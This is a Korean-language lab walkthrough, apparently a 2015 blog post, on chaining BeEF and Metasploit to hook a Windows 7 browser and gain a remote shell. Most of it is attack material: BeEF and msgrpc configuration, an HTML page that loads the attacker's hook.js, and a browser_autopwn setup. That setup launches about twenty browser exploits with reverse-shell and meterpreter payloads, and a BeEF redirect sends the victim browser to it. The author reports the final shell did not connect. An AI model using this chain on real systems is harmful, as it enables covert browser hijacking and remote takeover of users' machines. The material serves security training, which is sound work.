metasploit 18. BeFF + MSF 브라우저 해킹 원격 쉘 얻기

[추가적인 실습] - 2015년 12월30일 현재 정상적으로 실습이 되지 않는다.

 

BeFF + MSF = 통합

BeEF와 MSF 사용하여 브라우저 해킹을 시도하고 원격 쉘을 얻는 과정을 이해해 보자.

 

■ 사용시스템

- KaliLinux

- Windows 7(Chrome 브라우저 사용)

 

 

(windows 7)

 

■ 점검사항

윈도우7 방화벽 설정을 내린다.

Java 보안 설정에 192.168.20.50192.168.20.50:8080 사이트를 신뢰할 수 있는 사이트로 등록한다.

 

 

(kaliLinux)

 

① BeEF 설정 점검 및 필요하면 변경

[TERM1] 첫번째 터미널

# vi /usr/share/beef-xss/config.yaml

..... (중략) ..... /metasploit <--- 검색 # You may override default extension configuration parameters here extension: requester: enable: true proxy: enable: true key: "beef_key.pem" cert: "beef_cert.pem" metasploit: enable: true <--- 변경(false -> true) social_engineering: enable: true evasion: enable: false console: shell: enable: false ipec: enable: true # this is still experimental, we're working on it.. dns: enable: true

-> 이 파일의 가장 하단 부분(155번 라인)이다.

 

# vi /usr/share/beef-xss/extensions/metasploit/config.yaml

# # Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # Enable MSF by changing extension:metasploit:enable to true # Then set msf_callback_host to be the public IP of your MSF server # # Ensure you load the xmlrpc interface in Metasploit # msf > load msgrpc ServerHost=IP Pass=abc123 # Please note that the ServerHost parameter must have the same value of host and callback_host variables here below. # Also always use the IP of your machine where MSF is listening. beef: extension: metasploit: name: 'Metasploit' enable: true host: "127.0.0.1" /* 필요하면: 192.168.20.50 */ port: 55552 user: "msf" pass: "abc123" uri: '/api' # if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like: # load msgrpc ServerHost=IP Pass=abc123 SSL=y ssl: false ssl_version: 'TLSv1' ssl_verify: true callback_host: "127.0.0.1" /* 필요하면: 192.168.20.50 */ autopwn_url: "autopwn" auto_msfrpcd: false auto_msfrpcd_timeout: 120 msf_path: [ {os: 'osx', path: '/opt/local/msf/'}, {os: 'livecd', path: '/opt/metasploit-framework/'}, {os: 'bt5r3', path: '/opt/metasploit/msf3/'}, {os: 'bt5', path: '/opt/framework3/msf3/'}, {os: 'backbox', path: '/opt/backbox/msf/'}, {os: 'kali', path: '/usr/share/metasploit-framework/'}, {os: 'pentoo', path: '/usr/lib/metasploit'}, {os: 'win', path: 'c:\\metasploit-framework\\'}, {os: 'custom', path: ''} ]

 

② msgrpc plugin 로딩

# msfconsole

IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|\`.""'. II 6. .P : .' / | \ `. : II 'T;. .;P' '.' / | \ `.' II 'T; ;P' `. / | \ .' IIIIII 'YvP' `-.__|__.-'   I love shells --egypt     Validate lots of vulnerabilities to demonstrate exposure with Metasploit Pro -- Learn more on http://rapid7.com/metasploit   =[ metasploit v4.11.5-2015121501 ] + -- --=[ 1517 exploits - 871 auxiliary - 256 post ] + -- --=[ 436 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]   msf > load msgrpc Pass=abc123 [*] MSGRPC Service: 127.0.0.1:55552 [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc

-> Pass=abc123 주지 않으면 msgrpc plugin을 실행할때 마다 랜덤하게 암호가 변경이 된다.

-> 만약 랜덤하게 암호가 변경된 경우에는 /usr/share/beef-xss/extensions/metasploit/config.yaml 파일의 암호 부분을 랜덤한 암호로 변경한후 msgrpc 실행해야 한다.

-> 이런 번거로움을 피하기 위해서 msgrpc 실행할 때 Pass=abc123 붙여서 실행하면 된다.

-> msgrpc plugins 파일을 다음 위치에서 확인이 가능하다.

# cd /usr/share/metasploit-framework/plugins

# ls

msgrpc.rb

③ BeEF 실행

 

# beef-xss

or

# /usr/share/beef-xss/beef -x &

# firefox http://192.168.20.50:3000/ui/authentication &

 

[TERM2] 두번째 터미널

# cd /usr/share/beef-xss

# ./beef -x

[11:39:09][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [11:39:09][*] Browser Exploitation Framework (BeEF) 0.4.6.1-alpha [11:39:09] | Twit: @beefproject [11:39:09] | Site: http://beefproject.com [11:39:09] | Blog: http://blog.beefproject.com [11:39:09] |_ Wiki: https://github.com/beefproject/beef/wiki [11:39:09][*] Project Creator: Wade Alcorn (@WadeAlcorn) [11:39:09][*] Successful connection with Metasploit. [11:39:14][*] Loaded 292 Metasploit exploits. [11:39:14][*] Resetting the database for BeEF. [11:39:16][*] BeEF is loading. Wait a few seconds... [11:39:31][*] 13 extensions enabled. [11:39:31][*] 532 modules enabled. [11:39:31][*] 3 network interfaces were detected. [11:39:31][+] running on network interface: 127.0.0.1 [11:39:31] | Hook URL: http://127.0.0.1:3000/hook.js [11:39:31] |_ UI URL: http://127.0.0.1:3000/ui/panel [11:39:31][+] running on network interface: 192.168.10.50 [11:39:31] | Hook URL: http://192.168.10.50:3000/hook.js [11:39:31] |_ UI URL: http://192.168.10.50:3000/ui/panel [11:39:31][+] running on network interface: 192.168.20.50 [11:39:31] | Hook URL: http://192.168.20.50:3000/hook.js [11:39:31] |_ UI URL: http://192.168.20.50:3000/ui/panel [11:39:31][*] RESTful API key: a35d98ed0dcc5c8509615ec87f1635529648cba3 [11:39:31][*] HTTP Proxy: http://127.0.0.1:6789 [11:39:31][*] DNS Server: 127.0.0.1:5300 (udp) [11:39:31] | Upstream Server: 8.8.8.8:53 (udp) [11:39:31] |_ Upstream Server: 8.8.8.8:53 (tcp) [11:39:31][*] BeEF server started (press control+c to stop)

-> 장상적으로 실행이 되었다면 "BeEF server started (press control+c to stop)" 메세지가 나온다.

-> Hook URI 와 UI URL 확인한다.

 

 

 

 

④ Hooked 웹 페이지 생성

 

[TERM3] 세번째 터미널

hooked 웹페이지 생성시 이전에 사용하던 페이지를 사용해도 된다.

# vi /var/www/html/index.html

<html> <title> Pentesting</title> <head> Penetration testing with Kali Linux </head> <body> <script src="http://192.168.20.50:3000/hook.js"></script> <img src="http://d.ibtimes.co.uk/en/full/1427093/anonymous-isis-bitcoin-opisis.jpg?w=736"> </body> </html>

-> <img src>.... 들어가는 URL은 google.com 에서 이미지 검색(anonymous)을 통해 얻은 결과이다.

or

<HTML> <BODY> <CENTER><H1> It works! </H1></CENTER> <script src="http://192.168.20.50:3000/hook.js"></script> <P>This is the default web page for this server.</P> <P>The Web Server software is running but no content has been added, yet.</P> </BODY> </HTML>

 

⑤ apache2 서비스 start

# service apache2 restart

 

⑥ apache2 서비스 확인

# service apache2 status

● apache2.service - LSB: Apache2 web server Loaded: loaded (/etc/init.d/apache2) Active: active (running) since 수 2015-12-30 10:21:08 KST; 4s ago Process: 1864 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCESS) CGroup: /system.slice/apache2.service ├─1885 /usr/sbin/apache2 -k start ├─1889 /usr/sbin/apache2 -k start ├─1890 /usr/sbin/apache2 -k start ├─1891 /usr/sbin/apache2 -k start ├─1892 /usr/sbin/apache2 -k start ├─1893 /usr/sbin/apache2 -k start └─1894 /usr/sbin/apache2 -k start   12월 30 10:21:08 kali apache2[1864]: Starting web server: apache2.

 

⑦ firefox를 통해 BeEF UI를 실행한다.

# firefox http://192.168.20.50:3000/ui/panel &

 

로그인시 아이디/패스워드

ID: beef

PASS: beef

 

 

(windows 7)

 

⑧ 윈도우에서 192.168.20.50 사이트에 접속한다.

 

Chrome 브라우저를 사용하여 다음 사이트에 접속한다.

- http://192.168.20.50

 

그럼 브라우저가 후킹이 된다.

 

 

 

(KaliLinux)

 

⑨ BeEF에 Loading 된 metasploit module 목록을 확인

 

■ victim 시스템의 브라우저 정보를 확인한다.

Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202

Details 탭 > "Category: Browser" > "Browser UA String" 부분을 확인한다.

Broswer UA String: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

 

■ 로딩된 Metasploit modules 목록을 확인한다.

Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202

Commands 탭 > Module Tree > Metasploit(583)

로딩된 metasploit module 목록 확인

 

 

⑩ autopwn 실행

 

[TERM1] 첫번째 터미널

msf > search autopwn   Matching Modules ================   Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter auxiliary/server/browser_autopwn2 2015-07-05 normal HTTP Client Automatic Exploiter 2 (Browser Autopwn)   msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > show options   Module options (auxiliary/server/browser_autopwn):   Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)     Auxiliary action:   Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits   msf auxiliary(browser_autopwn) > set LHOST 192.168.20.50 LHOST => 192.168.20.50 msf auxiliary(browser_autopwn) > set SRVHOST 192.168.20.50 SRVHOST => 192.168.20.50 msf auxiliary(browser_autopwn) > set URIPATH / URIPATH => / msf auxiliary(browser_autopwn) > show options   Module options (auxiliary/server/browser_autopwn):   Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.20.50 yes The IP address to use for reverse-connect payloads SRVHOST 192.168.20.50 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / no The URI to use for this exploit (default is random)     Auxiliary action:   Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits   msf auxiliary(browser_autopwn) > exploit [*] Auxiliary module execution completed   [*] Setup [*] Starting exploit modules on host 192.168.20.50... [*] ---   [*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp[*] Using URL: http://192.168.20.50:8080/UqUY [*] Server started. [*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.20.50:8080/oXYTnoHftX [*] Server started. [*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.20.50:8080/QnfPsrs [*] Server started. [*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.20.50:8080/wgupGPJiQjLo [*] Server started. [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/SLiBeHzfmtIyI [*] Server started. [*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/kqeTeddw [*] Server started. [*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/wgeUVsbUeAM [*] Server started. [*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/sDkCueKug [*] Server started. [*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/NeianHITATMi [*] Server started. [*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/mRmRngPFvtJk [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.20.50:8080/xUwLHVJ [*] Server started. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/wlVjIArnOSoK [*] Server started. [*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/EJTBnigv [*] Server started. [*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/jStcaXwtjFBHe [*] Server started. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/wgwaXjOzG [*] Server started. [*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/hEZoSgmSh [*] Server started. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/xxuENMVhmF [*] Server started. [*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/nZmi [*] Server started. [*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/yDBAQiRN [*] Server started. [*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.20.50:8080/LxqBXAzEx [*] Server started. [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse handler on 192.168.20.50:3333 [*] Starting the payload handler... [*] Starting handler for java/meterpreter/reverse_tcp on port 7777 [*] Started reverse handler on 192.168.20.50:6666 [*] Starting the payload handler... [*] Started reverse handler on 192.168.20.50:7777 [*] Starting the payload handler...   [*] --- Done, found 20 exploit modules   [*] Using URL: http://192.168.20.50:8080/ [*] Server started.

-> 시간이 걸린다.(약 2분 ~ 5분 정도)

-> 정상적으로 실행이 되면 "Server started." 메세지가 보인다.

 

 

⑪ 클라이언트의 브라우저를 Hooked 웹페이지로 Redirect

 

BeEF 브라우저에서

 

Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202

Commands 탭 > Module Tree > Browser > Hooked Domain

Redirect Browser 선택

Redirect Browser 탭에서 다음 정보 입력

- Redirect URL : http://192.168.20.50:8080

- 오른쪽 하단의 "Excute" 선택

  

(windows 7)

웹 브라우저를 확인하면 다음과 같은 화면이 나올것이다.

 (KaliLinux)

[TERM1] 첫번째 터미널

-> 세션이 연결되었다는 메세지가 나올것이다.

-> 2015년 12월30일 현재

- firefox 최신판

- chrome 최신판

- IE 8 버전

에 대해서 테스트한 결과 셀 연결이 되고 있지는 않는것으로 나온다.

-> 이 부분에 대해서는 metasploit 업데이트가 된 이후에 다시 테스트 해 봐야 할것 같다.